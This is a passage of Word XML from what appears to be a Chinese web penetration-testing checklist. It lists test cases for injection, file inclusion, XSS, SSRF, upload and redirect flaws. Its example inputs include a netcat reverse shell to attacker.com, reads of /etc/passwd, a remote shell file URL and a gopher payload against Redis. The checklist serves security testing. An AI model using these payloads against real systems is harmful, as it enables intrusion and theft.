              <w:t>存在邮箱功能</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DDF339F">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="961390" cy="570230"/>
                  <wp:effectExtent l="0" t="0" r="10160" b="1270"/>
                  <wp:docPr id="39"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4"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId36"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="961390" cy="570230"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2581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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CCD59CD">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CFAC11A">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ACECA15">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68CB16A1">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>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9.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>代码注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A2B2D9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·在可执行命令的输入中提交例如eval(request.getParameter("code"))的恶意代码片段。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="52D47987">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38F1BE17">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="948055" cy="429260"/>
                  <wp:effectExtent l="0" t="0" r="4445" b="8890"/>
                  <wp:docPr id="3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1"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId37"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="948055" cy="429260"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="01EDE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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="096BB9B0">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4BF456C">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8D6E15A">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0DB162E3">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0.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>命令注入</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="692B4B6B">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·在可执行命令的输入中拼接;cat /etc/passwd或whoami</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3CF94779">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·在可执行命令的输入中拼接</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>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cat /etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>或whoami</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26901E7A">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·根据系统判断其他绕过字符</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="61B0EDD0">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4A4B31A2">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="956945" cy="438785"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="18415"/>
                  <wp:docPr id="3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2"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId38"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="956945" cy="438785"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5781A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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6AFE0D0B">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2F475649">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5EC5E896">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0C79715B">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11</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本地文件包含</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6978B9E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·在可输出的参数处注入/etc/passwd或</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>../../../../etc/passwd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>，验证是否读取敏感文件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A90B7B8">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60304144">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="955675" cy="487680"/>
                  <wp:effectExtent l="0" t="0" r="15875" b="7620"/>
                  <wp:docPr id="38"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3"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId39"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="955675" cy="487680"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="58CC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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EACBBCD">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3AD989D">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65C4A3A9">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191CB2EA">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12</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远程文件包含</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43C7888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在可输入的参数处输入http://attacker.com/shell.txt，检查服务器是否加载外部恶意文件。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68498AE5">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05DEAE83">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="948690" cy="488950"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
                  <wp:docPr id="4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35"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId40"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="948690" cy="488950"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1A314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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="506FDB25">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E36F6FA">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DADBB2C">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78B04B3">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13</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命令执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B401793">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·输入127.0.0.1 &amp;&amp; nc -e /bin/sh attacker.com 4444，测试反向Shell执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1CF2659F">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·在有回显的情况下输入whoami查看权限，输入ipconfig、ifconfig等查看命令执行情况</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5413CCBC">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17DE0FA9">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="949960" cy="508000"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
                  <wp:docPr id="3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0"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId41"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="949960" cy="508000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="798FE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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="03298E56">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C463987">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5D19EA67">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110D5AAD">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14</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存储型XSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="464253A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·提交&lt;script&gt;alert(1)&lt;/script&gt;至评论区，验证脚本是否被存储并触发。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2FE53649">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7C7D2F9C">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="955675" cy="67945"/>
                  <wp:effectExtent l="0" t="0" r="158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2"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="955675" cy="67945"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="34B3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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D4E02A3">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4C8167C">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5B1362C5">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30DF636">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15</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反射型XSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C10399">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·在URL参数中注入&lt;img src=x onerror=alert(1)&gt;，检查是否弹窗。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AFD04F8">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1A2ED847">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69E1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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="27269AFF">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F14FA63">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2D661F6">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5F689E0E">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16</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基于DOM的XSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6578E478">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·修改document.location.hash为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>#&lt;script&gt;alert(1)&lt;/script&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>，测试DOM解析漏洞。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="672BACF6">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37B824D9">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0F2C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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CFACF3A">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CECA3C2">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D533273">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9F68B3C">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17</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基于flash的XSS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BC351F8">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·检查crossdomain.xml是否允许任意域（</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>&lt;allow-access-from domain="*"/&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AEB700A">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4498A3D6">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65CC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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60928915">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0A1D28D">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B1768F5">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2A8BAEB">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18</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SSRF漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E1783BE">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·测试gopher协议（如gopher://127.0.0.1:6379/_*2%0d%0a$4%0d%0aINFO%0d%0a攻击Redis）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C222AB1">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·尝试ftp协议读取文件（如ftp://attacker.com/../../etc/passwd）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16F630AD">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50BBC653">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="957580" cy="316230"/>
                  <wp:effectExtent l="0" t="0" r="13970" b="7620"/>
                  <wp:docPr id="4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6"/>
                          <pic:cNvPicPr>
                            <a:picLocks noChangeAspect="1"/>
                          </pic:cNvPicPr>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId43"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="957580" cy="316230"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="4CF5D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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5F0E38F6">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FAC2DC5">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B64A526">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0D487DC7">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19</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任意文件上传</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="310DE255">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·根据网站开发语言上传.php</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>\.aspx\.jsp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>等文件并修改Content-Type为</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>image/png</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>，验证是否成功绕过校验。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F2080B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·根据文件上传绕过总结进行测试https://www.cnblogs.com/yokan/p/15252077.html</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="472817F0">
            <w:pPr>
              <w:widowControl/>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="71D50874">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="959485" cy="488315"/>
                  <wp:effectExtent l="0" t="0" r="12065" b="6985"/>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44"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="959485" cy="488315"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6C23A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1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="389197D9">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447B25D1">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3668F6D">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18988130">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20</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URL重定向漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DA0DBC4">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·在包含链接的参数处输入redirect=http://phishing.com，检查是否跳转至外部</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="509933E5">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恶意站点。</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2068B63B">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1442E185">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429A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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1FBF02E7">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DDF24A5">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48DBEC8">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6F1DCE44">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w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文仿宋" w:hAnsi="华文仿宋" w:eastAsia="华文仿宋"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:schemeClr w14:val="tx1"/>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:t>格式化字符串处理</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CDCEDC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·输入%n%n%n，测试是否触发内存崩溃或信息泄露</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78FC5B1B">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7469107A">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3A89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479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5A1E0C44">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4DC960B2">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18F7E41">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366F94FD">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22</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缓冲区堆溢出</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38EB6B8A">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·提交超长字符串（如5000个字符），验证是否导致进程崩溃</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="60FD5E71">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008D0917">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57B63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rPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1479" w:type="dxa"/>
            <w:vMerge w:val="continue"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
